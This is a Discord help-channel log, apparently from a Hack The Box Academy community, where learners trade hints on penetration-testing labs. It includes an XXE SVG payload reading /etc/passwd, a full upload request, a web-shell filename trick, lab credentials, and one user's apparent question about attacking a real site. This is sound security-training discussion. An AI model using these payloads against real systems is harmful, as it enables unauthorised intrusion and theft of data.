3 modules (and redoing Linux Priv Escalation) to go! Wheeeee! (and no please don't release another module before I've finished!)

vague tendon
#

hey does anyone have a recommendation on which modules to start and in which order i should learn them.

acoustic owl
acoustic owl
maiden bear
#

are there different using crackmapexec from binaries and crackmapexec with python environment ?

vague tendon
#

@acoustic owl tank you

pine dagger
maiden bear
#

Hi, ask something with double hop kerberos. how if we got an initial shell as user who the computer is joined to some domain. but the klist in your reverse shell is 0, and you didnt know about the user password cause you got in from reverse shell. also you are not administrator and not possible to escalate privilege, is that still possible to enumerate the active directory from that siatuation?

sly reef
#

you can do credentialed enum if i remember correctly

maiden bear
#

you mean enumerating credential stored in local?

sly reef
#

that has nothing to do with getting or not a kerberos ticket

#

if you have local admin you can do it

sly reef
maiden bear
sly reef
#

then u need to priv esc

maiden bear
#

not possible too

sly reef
#

dead end

#

then

rotund sphinx
#

๐Ÿค” hi, having issues with the 2nd question on intro to metasploit,

Which version of Metasploit is free and can be used only through a CLI?

im fairly confident my answer is correct but its not accepting it ๐Ÿ˜ฆ (tried a few variations)

sly reef
#

what have u tried?

rotund sphinx
#

metasploit framework
Metasploit Framework
framework
Framework

sly reef
#

try msfconsole

rotund sphinx
#

that is accepted but i dont believe thats the correct answer to the question / the correct questionfor that answer

#

if the question was "what is the command to run the free vesion of metasploit" then i would have given that first try :p

#

oh well, thanks for the answer :p

sly reef
#

np

rare topaz
#

msf = metasploit framework
console = cli

#

so that's likely what they were going with.

rotund sphinx
#

the whole module talks about the 2 versions being "Metasploit Framework" and "Metasploit Pro" though

#

Metasploit as a product is split into two versions. The Metasploit Pro version is different from the Metasploit Framework one with some additional features

rare topaz
#

well yes but they did say "through the CLI"

#

also module answers arent always from the actual module itself, unlike THM.

#

They'll sometimes ask you to literally google the answer.

rotund sphinx
#

thats fine, but the module gives the names for the 2 versions and a comparison between them, q1 asks which version has a gui, q2 asks which one is only usable with cli

its not that it required additional research beyond what the module contained, the module names the 2 versions several times and explains the differences between them, but then those names that were used are only correct for the first question

pine dagger
clever sage
#

Can anyone help me with Intro to Assembly Language first skill assesment I'm hard stuck on it.
Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.
At first I tryed writing my own code to decode it, but all the shellcodes that I got did not work. Then I decided to google a bit and found the code to do it on the HTB forums that should work, but after many attempts I still have seemingly gotten no closer. I can list all of the shellcodes that I have tryed so far if it would be any help. So if anyone has any hint or ideas of what I could be doing wrong I would appreciate it.

whole grotto
#

Hi everyone! I'm currently in the AD module in the attacking domain trust ... from windows section. I've tried to connect in RDP with the new credentials but every time it says "wrong credentials". I've tried putting the domain inlanefreight.local before the user but that doesn't work either. Can anyone think of a way to fix this? It's holding me back. Thanks in advance.

ebon sapphire
# trail leaf there are 4 keys in the answer

Thank you for your response, I see now what they were looking for. It's worded really bad in my opinion. For example, it says answer format is [key] + [key] + [key] which is only 3. So if are going to say what the format is, it should say [key] + [key] + [key] + [key]. I would also disagree that shift , part of the shift % should be separate "flags" because the only way to get a % is to hit the shift button, that should be implied. I'm just ranting a bit, when it comes down to some of the non standard flags like the HTB{} tends to be a bit more picky.

frozen mesa
#

File transfers -> Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.

C:\Users\htb-student\Desktop>hasher upload_win.txt
8990089e402b00f809810659fefb5523

But the answer is incorrect. Any hints?

pulsar needle
#

You might have downloaded the wrong file

barren apex
#

i for the life of me cant find the RDP username on the windows priv esc module - Further Credential theft

frozen mesa
rustic sage
frozen mesa
subtle flicker
rustic sage
subtle flicker
#

Or maybe some problems during the upload, check with md5 hashes to see if the files it's the same

frozen mesa
subtle flicker
rustic sage
#

yeah, happens quite often

tranquil axle
barren apex
hollow finch
#

yeah i'm having the same issue

rotund urchin
#

Can I get some help on the AD Emumeration and Attacks skills assessment part 2?

desert cove
#

Hello im stuck at the footprint hard module i have obtained the private ssh key but i dont know how can i convert it to a public key i have tried to vim it as id_rsa and chmod 600 but when i try to convert it i get bad permissions.

barren apex
#

why are you trying to convert it?

desert cove
#

Because when i try to ssh it wants the public key

barren apex
desert cove
#

Yes I've saved it the desktop folder .ssh and from there im trying to connect

trail leaf
#

I haven't done the footprinting module, but let's get this straight

  • A list of valid public keys for a user is stored in /home/$USER/.ssh/authorized_keys
  • The private key's permissions need to be 600, doesn't really matter where you store it
  • It is possible to get the public key from the private key, can't remember the command off the top of my head but it's very easy to google
desert cove
#

Okay i will try but does it matter how i save the private key with what text editor and with what format ?

vital adder
vital adder
desert cove
#

Yes im trying to log as tom to ssh

vital adder
#

and do to have the that user ||key||?

desert cove
#

I found the private key in the imap with ||Tom's|| credentials

calm heath
#

Im stuck in the imap of this module! Every fetch command gives me an error any help is aprreciated

vital adder
vital adder
calm heath
#

Fingerprinting module hard lab @vital adder im having trouble grabbing the emails within the imap server

vital adder
frigid fable
#

Hello everyone
I'm in module "Dynamic Port Forwarding with SSH and SOCKS Tunneling"

I'm getting stuck on this question "Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop."

First, I have Enabling Dynamic Port Forwarding with SSH. and try using xfreerdp with Proxychains "proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123" but it's show error
[23:35:48:859] [957966:957976] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[23:35:48:872] [957966:957966] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

I also try using rdesktop with Proxychains but it's username or password is not correct. "proxychains rdesktop -u victor -p pass@123 172.16.5.19"

I have try to restart the lab several times and still have the same issue.

Do I miss something?

vital adder
#

did you change the port in the config file? also try to scan port 3389 with nmap just to confirm that you have access to the target machine through the proxy

frigid fable
#

Yes config file already configed
โ””โ”€$ tail -4 /etc/proxychains4.conf

socks4 127.0.0.1 9050
and nmap scan is reachable to target 172.16.5.19.

vital adder
#

from the xfreerdp error it's look like a timeout issue try adding this to your rdp command /timeout:80000

frigid fable
#

wow great, it's solved now.
Thank you

barren apex
#

on windows priv esc any hints as to what share the .scf needs to go in for it to be activated

#

only getting my user

trail leaf
#

Figure out what shares/folders are writable by the user they give you

#

only one of them is

barren apex
#

lol cheers got it, wasmucking about in the network share

calm heath
#

@vital adder when i fetch all it shoes a bunch or irrelevant info jothing really to see. I must be missing something

vital adder
#

hint it's not fetch all

calm heath
#

Thanks!

#

Love u rn

hazy grotto
#

Linux Priv Polkit

trail leaf
#

try to compile on an older version of glibc

mortal shadow
#

HELP: how can i open these urls in the browser?

#

they are not being found on the server eventhough i were able to upload them

hazy grotto
trail leaf
#

glibc 2.34 added some stuff that isn't exactly backwards compatible, so the target machine is probably running on something before it

mortal shadow
#

also found these, but if i open them in the browser they only show the picture and no web shell

trail leaf
#

Just because you get a response code of 200 does not mean the file upload was successful

#

If the request uploaded, you would see it in the upload folder

#

Reread the section again, it gives you everything you need to do to bypass the filter

mortal shadow
#

i see it was being uploaded in the response

#

i see it in the upload folder but acnt acces them

#

as \ changes to / once i open it in the browser

mortal shadow
trail leaf
#

have you tried passing a parameter to the file anyway to see what happens?

mortal shadow
#

yes

#

/profile_images/shell:.phtm.jpg?cmd=ls

drowsy kelp
#

hey guys, need help in "SQLMap Essentials" module

#

What's the contents of table flag5? (Case #5)

#

The contents of table flag5 are not retrieved

#

tried '--no-cast' switch well

#

that didnt work too

lime wraith
#

Hellos

trail leaf
#

if it ends in jpg, the server will process it as a jpg

#

I thought I had the solution in my notes but apparently I forgot to copy the name so I could be wrong, but that's what it looks like from what you've shown

mortal shadow
drowsy kelp
mortal shadow
#

can you send link of target so i can try?

#

but likely testdb is the issue

drowsy kelp
#

83.136.251.221:44882

#

case5

mortal shadow
#

working for me

drowsy kelp
mortal shadow
#

mostly

compact patrolBOT
rustic sage
#

start-here

#

:(

#

why didnt work

compact patrolBOT
rustic sage
#

oh

#

worked yay

fathom pendant
#

All you gotta do is click the link and it tells you

fathom pendant
#

No

fathom pendant
maiden spindle
#

hey, I'm stuck on Footprinting lab - Medium. I'm not sure how to get into the SQL Management Studio. I've got on through remmina with alex.

fathom pendant
maiden spindle
#

explore the tech support .txts?

#

I uesed grep to search for pass*

fathom pendant
#

Nope

#

There's a file somewhere that contains the login

#

Just explore all files a* has access to

#

I believe it's titled "important"

#

Or something like that

sleek urchin
# hazy grotto Linux Priv Polkit

I have faced the same problem in that section and in other sections where you need to compile a .c file, I moved the .c file to victim's machine and compiled there, and it works just fine

maiden spindle
#

@fathom pendant found it! thank you, I struggle to think to do things I didn't already do in previous exercises

mortal shadow
#

anyone got that ever before?

sleek urchin
mortal shadow
#

just re-added it, working thanks!

#

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <svg>&xxe;</svg>

#

but how can i access the root directory

#

tried almost every combination xd

#

most sense for **flag found at the root directory "/". **would be:

<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
<svg>&xxe;</svg>```
sleek urchin
#

just like that file://flag.txt

mortal shadow
#

sadly nothing :/

#
Host: 83.136.254.230:42616
Content-Length: 307
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfI5exmeUcKa6H2Me
Origin: http://83.136.254.230:42616
Referer: http://83.136.254.230:42616/contact/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundaryfI5exmeUcKa6H2Me
Content-Disposition: form-data; name="uploadFile"; filename="HTB.svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file://flag.txt"> ]>
<svg>&xxe;</svg>

------WebKitFormBoundaryfI5exmeUcKa6H2Me--
#

you can try yourself if you want

#

but file:// returns the svg tags

sleek urchin
#

or index file ?

mortal shadow
#

wdym?

#

also took a look at /etc/mtab

#

kinda whack to not be able to see the directory but just only a file directly

sly tapir
#

enjoyed that threat hunting module..i think i like elastic over splunk...not sure

pine dagger
#

They've both got positives and negatives. I think Elastic feels a lot nicer, and is a bit more intuitive.

sly tapir
#

yea, i like the way you filter on Elastic vs Splunk

pine dagger
#

the drill down, certainly

maiden spindle
#

Footprinting lab - Medium. I can't figure out the syntax for MSSQL management studio. In query show doesn't work as a command. I've looked through microsoft's info but I'm not figuring it out.

calm heath
#

You can look elsewhere without querying the database to find the login infoโ€ฆ

umbral wigeon
maiden spindle
#

@umbral wigeon Thank you, I found 200 names and passwords but those are devaccs? None are HTB. where can i lean cli enumiration for this? I see other people have gotten stuck in the GUI before

umbral wigeon
maiden spindle
#

THANK YOU! got it with the where clause

#

You can

#

You can't use "fu" you have to use 'fu' (for the next person)

elfin cedar
#

I am stuck ๐Ÿ˜ญ

#

I mounted the NFS share, and was able to cd into as root. All I see are a bunch of ticket43243214321.txt files when I use the ls -a command. Nothing happens what I try to cat them.

heavy marsh
#

Getting a permission denied(publickey) error when trying the EASY footprinting lab.

#

They gave the creds in the lab brief, why is this not working?

elfin cedar
fathom pendant
fathom pendant
#

So check other services

#

That's literally what that message means

elfin cedar
#

am I allowed to post a screenshot?

heavy fox
#

guys i need help i found vuln 500 http error because of his HTTP GET request, if i put symbol on parameters it turns to http 500, how do i get the database with sql map?

fathom pendant
elfin cedar
fathom pendant
heavy fox
#

i cant post screenshot ๐Ÿ˜ฆ

fathom pendant
#

Not just -a

elfin cedar
#

no way

#

like how am I gonna do this ????

#

it worked

heavy marsh
fathom pendant
fathom pendant
heavy fox
#

sorry i thought i can talk about ilegal, mb

fathom pendant
#

It's not an error, nor broken

heavy marsh
fathom pendant
heavy marsh
#

I don't want to post it

fathom pendant
#

You have to enumerate and leverage another running service to obtain the key

heavy marsh
#

I have the ssh-hostkey

fathom pendant
#

Thats not the same

heavy marsh
#

and the ssh-rsa

elfin cedar
#

I cant believe thats all it was

fathom pendant
#

Look at all running services. You will use the login credentials given to sign into one

elfin cedar
#

๐Ÿ˜ญ

fathom pendant
#

If you want to take it a step further so you can unmount from the nfs share you can copy the ticket to your local machine @elfin cedar

balmy saffron
#

Hello,
Can somebody remind me in which section we get wley's password in the active directory module?

fathom pendant
fathom pendant
#

(In reality I can't be bothered to find it, iirc during one of the hash grabbing ones I just took ALL the user hashed and bruted

#

I dont remember which one was the intentional wley account one

heavy marsh
#

not showing anything

#

now I'm stuck

fathom pendant
#

ahem add -la

#

I should start charging people for helping them

heavy marsh
#

that's all I got

fathom pendant
fathom pendant
heavy marsh
#

already did 22, ssh wouldn't accept creds

fathom pendant
#

Use. Nmap

#

There's a reason I'm suggesting checking all running ports. How can you be so sure that you checked them all, if you don't check for them

heavy marsh
#

yeah 2121?

#

lol

#

that got my hopes up, but no

fathom pendant
#

What service could be running on it

#

Take my previous advice

#

That is literally all I'm willing to tell you at this point

#

Because it's really that simple

#

And you have this process a lot easier than I did, I had to find [or use the previous hint] the username and password. You're flat out given it and told to hunt for the footprints

fathom pendant
#

Extended might be messing with it

heavy marsh
#

did "ftp <user>@<ip>:2121

fathom pendant
#

But I guarantee you that it's there

heavy marsh
#

extended?!

fathom pendant
#

Do a space after ip

#

Not colon

heavy marsh
fathom pendant
#

Reading the man page?

heavy marsh
#

checked man page

#

haha

#

I was typing that as you said that

fathom pendant
#

Google

#

ยฏ_(ใƒ„)_/ยฏ

heavy marsh
#

just so you know I'm not BSing

#

I'm trying , lol

fathom pendant
#

Huh that looks like a space after where it says "host"

#

[host [port] ]

#

You'd think if it was colon it would be [host:port]

#

Literally looking at the example you showed me

heavy marsh
#

oh, got it, so SYNOPSIS means SYNTAX?

fathom pendant
#

Yes

heavy marsh
#

I read way further into the page

#

perfect, thanks!

fathom pendant
#

The other parts are just optipns

#

ALSO

#

Most other commands that allow you to choose the port have -p as an option. I can't think (aside from websites) of any commands that use : but I could be wrong

heavy marsh
#

I know there is very specific syntax as I've used it before, but I can't find it.

fathom pendant
#

chmod

heavy marsh
#

is it -i?

fathom pendant
#

Yes

#

Just make sure it has the right permissions set otherwise it'll throw an error at you

heavy marsh
#

haha, yeah, -i was right, but the permissions were wrong

fathom pendant
#

Told you :)

heavy marsh
#

Thanks. I wasn't even to the point of needing to change permissions when you told me that, then I finally figured the syntax and tried it and was like "Okay MarcieLee you're one step ahead"

#

Working now, I googled the permission stuff

#

Trying to keep a good balance of making these conversations searchable with keywords without giving away spoilers!

heavy marsh
fathom pendant
heavy marsh
fathom pendant
#

this is just advice for future ยฏ_(ใƒ„)_/ยฏ

#

Also just an FYI, I'm literally only using my notes and memory to assist. As I'm currently without wifi for a bit

heavy marsh
#

I got through a small moleskine notebook during my initial stages of IT/Cyber learning.

#

How are you on Discord without WIFI, mobile data?

fathom pendant
#

Yep

#

My notes are in "Obsidian"

#

Definitely look that program up as it's free and utilizes markdown

heavy marsh
heavy marsh
#

mount: bad usage
Try 'mount --help' for more information.

#

trying Medium Footprinting and this is what I'm getting

#

Can't get a foothold in Footprinting Medium

#

Already tried NFS on port 2049.

#

The hint is confusing because it points to SQL which is not one of the ports found with the nmap scan

#

I'm basically trying everything at this point

#

Everything I've searched is people trying SQL and other stuff that doesn't work

#

Pretty much trying to mount NFS but it is not working

#

haha, even the hint mentions SQL, what am I missing?

fathom pendant
heavy marsh
#

Stuck at the basics

fathom pendant
fathom pendant
#

So maybe do that:)

rustic sage
elfin cedar
#

MY BRAIN

#

im done

fathom pendant
fathom pendant
rustic sage
#

Alrighty

elfin cedar
#

just finished the hard footprinting

heavy marsh
fathom pendant
heavy marsh
#

Correct, no mount

fathom pendant
#

Try adding TechSupport to the ip:/ portion

heavy marsh
elfin cedar
#

I use Obsidian too @fathom pendant

heavy marsh
#

I'm resetting my target

fathom pendant
#

I dont recall having too much trouble with the nfs part. My notes don't reflect having issues

heavy fox
#

@fathom pendant is it possbile to unhash bcrypt password?

fathom pendant
heavy fox
#

lemme try download hashcccat

fathom pendant
heavy fox
#

thanks ya โค๏ธ

heavy marsh
#

So what's the key to the Medium footprinting lab.

#

I've tried everything

fathom pendant
#

Also make sure you're doing the syntax properly using sudo

heavy marsh
#

mount.nfs: remote share not in 'host:dir' format

#

I'm trying to use a temporary folder in my home directory and pointing to it properly

#

what is the problem?

fathom pendant
#

Try not having the colon

heavy marsh
#

sudo mount -t nfs <ip>/TechSupport /home/kali/medfootprint -o nolock

#

this is what I'm doing

fathom pendant
#

It's probably something simple

heavy marsh
#

No reason this shouldn't work as far as I've found

heavy marsh
fathom pendant
#

Try just removing the file part

heavy marsh
#

the /TechSupport part?

fathom pendant
#

Just the ip then where you're mounting to

#

Ye

heavy marsh
#

tried that

fathom pendant
#

Ah

#

It's something simple and I'm blanking on it bc I really don't recall having issues

heavy marsh
#

Still not working

autumn pilot
#

nope

fathom pendant
#

Only plan is the silver annual for it

#

They all tell you exactly what they give you

#

Inb4 gets tutoring and still can't answer what 9+10 is (joking)

#

Name?

#

Yes

fathom pendant
autumn pilot
#

no

fathom pendant
#

Darn

#

There goes easy money

#

I won't tell you any other info

#

Not necessarily. But there's definitely a good bunch of info readily available

#

You do know it. Read the prompt

#

DNS isn't smtp

#

You're thinking too hard

#

It's really that simple

#

Not all systems are going to be running a dns server

#

But yes a revshell will be your end goal

#

@elfin cedar since you just did this do you mind assisting @heavy marsh with this?

#

Footprinting: medium ^

umbral wigeon
#

poor guy got tagged for no reason haha

fiery berry
fathom pendant
heavy marsh
#

I've tried everything

#

How did my post get deleted?

fathom pendant
#

They deleted my replies to you too

heavy marsh
#

A mod employed by HTB?

fathom pendant
#

Mods/admins tend to be volunteers there are some that have the "staff" role though

autumn pilot
#

first you need to understand the commands you are running, and of course if you have mounted the share as root a normal user won't be able to access it